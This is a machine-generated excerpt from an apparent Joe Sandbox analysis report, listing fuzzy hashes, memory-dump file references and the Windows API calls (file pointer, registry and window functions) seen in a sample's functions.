                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                    • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                    • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                    • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                    • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                    • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                    • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                    • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                    • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                    • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                    • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                    • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                    • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                    • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                    • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                    • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                    • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                    • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                    • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                      • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                    • SetFilePointer.KERNELBASE(001654D9,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1092082344-0
                                                                                                                    • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                    • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                                    • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                    • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                      • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                      • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 334405425-0
                                                                                                                    • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                    • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                                    • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                    • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                                    APIs
                                                                                                                    • GlobalFree.KERNEL32(0068A290), ref: 00401BE7
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree
                                                                                                                    • String ID: Call
                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                    • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                    • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                                    • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                    • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 397863658-0
                                                                                                                    • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                    • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                                    • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                    • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                    • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                                    • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                    • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3356406503-0
                                                                                                                    • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                    • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                                    • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                    • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                                    APIs
                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                    • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                    • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                    • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                    APIs
                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2831762973-0
                                                                                                                    • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                    • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                                    • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                    • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1136574915-0
                                                                                                                    • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                    • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                    • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                    • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                      • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                      • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                      • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
